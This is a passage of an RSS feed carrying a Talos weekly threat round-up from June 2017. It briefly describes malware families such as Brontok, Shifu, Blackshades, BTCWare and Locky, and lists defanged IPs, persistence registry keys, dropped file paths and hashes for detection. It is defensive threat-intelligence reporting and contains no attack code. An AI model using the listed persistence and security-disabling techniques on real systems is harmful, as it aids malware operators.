&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/308HM9R-tjw" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-06T12:32:52.465-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-93obnOaP-xA/WVQ-U9V1uMI/AAAAAAAABJ4/yTs9T88dAXsWtd-AA5uxk8eZGYLClJ8ZQCLcBGAs/s72-c/295C30B1-A6BA-4FA7-9384-223EFA1B3075.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">21</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html</feedburner:origLink></item><item><title>Threat Round-up for June 16 - June 23</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/LGYCPT-CKkM/threat-roundup-0616-0623.html</link><category>ClamAV</category><category>Coverage</category><category>Malware</category><category>Snort</category><category>Umbrella</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Fri, 23 Jun 2017 12:55:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-1841553473017849420</guid><description>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 16 and June 23. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.&lt;br /&gt;&lt;br /&gt;As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. 
For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;This week's most prevalent threats are:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Doc.Macro.StrObfuscation-6329879-0&lt;/b&gt;&lt;br /&gt;VB Macro&lt;br /&gt;Microsoft Office macros can be obfuscated in various ways. A recent resurgence of malicious Word documents includes the use of string obfuscation to mask the intended functionality.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Dropper.skypee-6329923-0&lt;/b&gt;&lt;br /&gt;Dropper&lt;br /&gt;This malware is a trojan dropper that is used to steal banking information and user credentials. It leverages Visual Basic code to install itself and establish persistence. Characteristics this malware exhibits include connecting to different domains to POST data using URI patterns like /http/image.php or /admin/image.php.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Worm.Untukmu-5949608-0&lt;/b&gt;&lt;br /&gt;Worm&lt;br /&gt;Untukmu, also known as Brontok, is a worm that spreads through email or infected USB drives. It stores several copies of itself in different places on the hard disk, including system directories. It gains persistence by modifying registry keys and creating an entry in the Startup directory. It also modifies several system configuration parameters to disable the registry editor and the shell, as well as modifying the safeboot shell to prevent the user from cleaning the machine.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Shifu-6330434-1&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;This well-known malware family contains countermeasures to protect itself from analysis. 
It gathers details about its victims by stealing users' login credentials for online banking.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Blackshades-6327385-1&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Blackshades is a prevalent trojan with many capabilities, including logging keystrokes, recording video from webcams, and downloading and executing additional malware.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.BTCWare-6329927-0&lt;/b&gt;&lt;br /&gt;Ransomware&lt;br /&gt;BTCWare is active Windows ransomware that was first discovered a few months ago. Since then, it has undergone various changes, including changes to the encrypted file extension and the cipher used to encrypt such files. Earlier variants relied on weaker cryptography options that included RC4, allowing brute-force recovery of the private key in some cases. There was also a noted variant that had its private RSA key leaked online. This recent variant relies on AES-256 with improvements to the handling of the private key generation.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Dropper.Agent-6330744-0&lt;/b&gt;&lt;br /&gt;Office Macro Downloader&lt;br /&gt;This is an obfuscated Office macro downloader that leverages PowerShell to download a malicious payload executable. The host that these samples attempt to download the next stage from currently does not resolve.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Yakes-6330794-0&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Yakes is a trojan which installs itself on a machine via a .vbs script in the Startup folder, and then allows its packager to connect to the infected machine. IPs and domain names of the CnC server as well as mutex names vary depending on the packager.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.Locky-6330799-0&lt;/b&gt;&lt;br /&gt;Ransomware&lt;br /&gt;Throughout the majority of 2016, Locky was the dominant ransomware in the threat landscape. 
It was an early pioneer when it came to using scripting formats Windows hosts would natively handle, like .js, .wsf, and .hta. These scripting formats acted as a vehicle to deliver the payload via email campaigns. Recent in-depth look: &lt;a href="http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html"&gt;http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html&lt;/a&gt;&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.DownloaderJava-6330457-0&lt;/b&gt;&lt;br /&gt;Downloader&lt;br /&gt;This sample is a .NET downloader. It downloads additional Java files from a hardcoded URL and executes them. This binary is actively sent as an attachment in an ongoing spam campaign.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;hr /&gt;&lt;h2&gt;Threats&lt;/h2&gt;&lt;h3&gt;Doc.Macro.StrObfuscation-6329879-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;185[.]165[.]29[.]36&lt;/li&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%TEMP%\&amp;lt;random_string&amp;gt;.txt&lt;/li&gt;&lt;li&gt;%TEMP%\&amp;lt;random_string&amp;gt;.js&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="https://1.bp.blogspot.com/-1Aqlb5LXdis/WU1vE2MqaoI/AAAAAAAABG4/9niZ6mlN1AYdNAAYFqJkH_sfooWCOBrIwCLcBGAs/s1600/Doc_Macro_StrObfuscation_6329879_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-1Aqlb5LXdis/WU1vE2MqaoI/AAAAAAAABG4/9niZ6mlN1AYdNAAYFqJkH_sfooWCOBrIwCLcBGAs/s400/Doc_Macro_StrObfuscation_6329879_0_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-hDKL82TkWOI/WU1vKSBnzyI/AAAAAAAABG8/_x8jdPCIi84g_6Fi45gN5moCnd4XWqBlQCLcBGAs/s1600/Doc_Macro_StrObfuscation_6329879_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="807" data-original-width="1237" height="260" src="https://4.bp.blogspot.com/-hDKL82TkWOI/WU1vKSBnzyI/AAAAAAAABG8/_x8jdPCIi84g_6Fi45gN5moCnd4XWqBlQCLcBGAs/s400/Doc_Macro_StrObfuscation_6329879_0_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-LIcOjCsGqqY/WU1vPTdSbzI/AAAAAAAABHA/rjfFPYoA8ss4pkYRL4y6R3HXflHCSfmuwCLcBGAs/s1600/Doc_Macro_StrObfuscation_6329879_0_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="600" data-original-width="1092" height="218" src="https://4.bp.blogspot.com/-LIcOjCsGqqY/WU1vPTdSbzI/AAAAAAAABHA/rjfFPYoA8ss4pkYRL4y6R3HXflHCSfmuwCLcBGAs/s400/Doc_Macro_StrObfuscation_6329879_0_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div 
class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-Rt7tcTBRl7A/WU1vTVvWAtI/AAAAAAAABHE/6OGezlkaS2g39xoDcahO8KcsE7CdK4d4ACLcBGAs/s1600/Doc_Macro_StrObfuscation_6329879_0_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="300" src="https://2.bp.blogspot.com/-Rt7tcTBRl7A/WU1vTVvWAtI/AAAAAAAABHE/6OGezlkaS2g39xoDcahO8KcsE7CdK4d4ACLcBGAs/s400/Doc_Macro_StrObfuscation_6329879_0_malware.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Dropper.skypee-6329923-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;skypee&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;1505527138&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-mF4MCAyrarQ/WU1ven90yFI/AAAAAAAABHI/0HIrnFDWpYk39qaTXBKO4E5m6rjSpnZMACLcBGAs/s1600/35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-mF4MCAyrarQ/WU1ven90yFI/AAAAAAAABHI/0HIrnFDWpYk39qaTXBKO4E5m6rjSpnZMACLcBGAs/s400/35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-bmxrWr8Uyes/WU1vi7NF3NI/AAAAAAAABHM/hr2-BJC-6IUPmbJDklb-FZzTSTGut9GGgCLcBGAs/s1600/35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1395" 
data-original-width="1237" height="400" src="https://2.bp.blogspot.com/-bmxrWr8Uyes/WU1vi7NF3NI/AAAAAAAABHM/hr2-BJC-6IUPmbJDklb-FZzTSTGut9GGgCLcBGAs/s400/35b8bf77573eef9acef8b19521e43ce3d440a5e02ccf6deda05ae58eeac3cfe8_threatgrid.png" width="353" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-FtIsGqEOezk/WU1vmkvrHsI/AAAAAAAABHQ/5M5-Qfj-nmocjOvTyWx3nBnGRaVyLsD_ACLcBGAs/s1600/sonic4us.ru_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="558" data-original-width="1112" height="200" src="https://3.bp.blogspot.com/-FtIsGqEOezk/WU1vmkvrHsI/AAAAAAAABHQ/5M5-Qfj-nmocjOvTyWx3nBnGRaVyLsD_ACLcBGAs/s400/sonic4us.ru_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Worm.Untukmu-5949608-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\OFFICE\12.0\OUTLOOK\RESILIENCY\STARTUPITEMS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;w+%&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\OFFICE\12.0\OUTLOOK\RESILIENCY\STARTUPITEMS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;l:(&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;LogonAdministrator&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\INSTALLER&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: 
&lt;/b&gt;DisableMSI&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisableSR&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\CONTROL PANEL\DESKTOP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;SCRNSAVE.EXE&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;NoFolderOptions&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CABINETSTATE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;FullPathAddress&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisableRegistryTools&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\CONTROL PANEL\DESKTOP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ScreenSaveTimeOut&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisableCMD&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;xk&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisableConfig&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\AEDEBUG&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Debugger&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS 
NT\CURRENTVERSION\WINLOGON&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Shell&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;internat.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MENUORDER\START MENU&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Order&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\Office\12.0\Outlook\Resiliency\StartupItems&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\CLASSES\lnkfile\shell\open\command&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\CLASSES\LNKFILE\SHELL\open&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\Windows\CurrentVersion\Policies\System\&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\CSRSS.EXE&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\winlogon.exe&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\smss.exe&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\SERVICES.EXE&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\SMSS.EXE&lt;/li&gt;&lt;li&gt;%System32%\shell.exe&lt;/li&gt;&lt;li&gt;\Documents 
and Settings\All Users\Start Menu\Programs\Startup\Empty.pif&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\lsass.exe&lt;/li&gt;&lt;li&gt;\XK\Folder.htt&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\csrss.exe&lt;/li&gt;&lt;li&gt;%WinDir%\xk.exe&lt;/li&gt;&lt;li&gt;\Data Administrator.exe&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\services.exe&lt;/li&gt;&lt;li&gt;%System32%\IExplorer.exe&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\LSASS.EXE&lt;/li&gt;&lt;li&gt;%System32%\Mig2.scr&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\WINLOGON.EXE&lt;/li&gt;&lt;li&gt;\xk.exe&lt;/li&gt;&lt;li&gt;\XK\New Folder.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;26fbb2aa5a28de5e149e0178dacb964333c852bbca2a1416d860e5edc84cbe04&lt;/li&gt;&lt;li&gt;b5e7b1b06efe80a081a2cbdff0fab4539be0797b2351ab4e1b247303586d1340&lt;/li&gt;&lt;li&gt;36890fa6756c252bc89abb88ec9da140cd87937eb5223af05e4e8ef36ec019c9&lt;/li&gt;&lt;li&gt;34c9c0d2fbb403f7e8068ce49071da6dbeadc4ad995101388c9ad092e38f90de&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="https://3.bp.blogspot.com/-CKFWoxxdL2Q/WU1vvZC_SPI/AAAAAAAABHU/oGf5-EhRF2QvHYkoxGOujTA5slXfvuLUgCLcBGAs/s1600/Win_Worm_Untukmu_5949608_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://3.bp.blogspot.com/-CKFWoxxdL2Q/WU1vvZC_SPI/AAAAAAAABHU/oGf5-EhRF2QvHYkoxGOujTA5slXfvuLUgCLcBGAs/s320/Win_Worm_Untukmu_5949608_0_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-IaU9KzQr6Ks/WU1vzr8LQQI/AAAAAAAABHY/aT98Ml9u6jgQoIu49-sTSl1FLg-N9V07ACLcBGAs/s1600/Win_Worm_Untukmu_5949608_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1311" data-original-width="1237" height="400" src="https://3.bp.blogspot.com/-IaU9KzQr6Ks/WU1vzr8LQQI/AAAAAAAABHY/aT98Ml9u6jgQoIu49-sTSl1FLg-N9V07ACLcBGAs/s400/Win_Worm_Untukmu_5949608_0_threatgrid.png" width="376" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Shifu-6330434-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;IntelPowerAgent[0-9]&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;DGA 
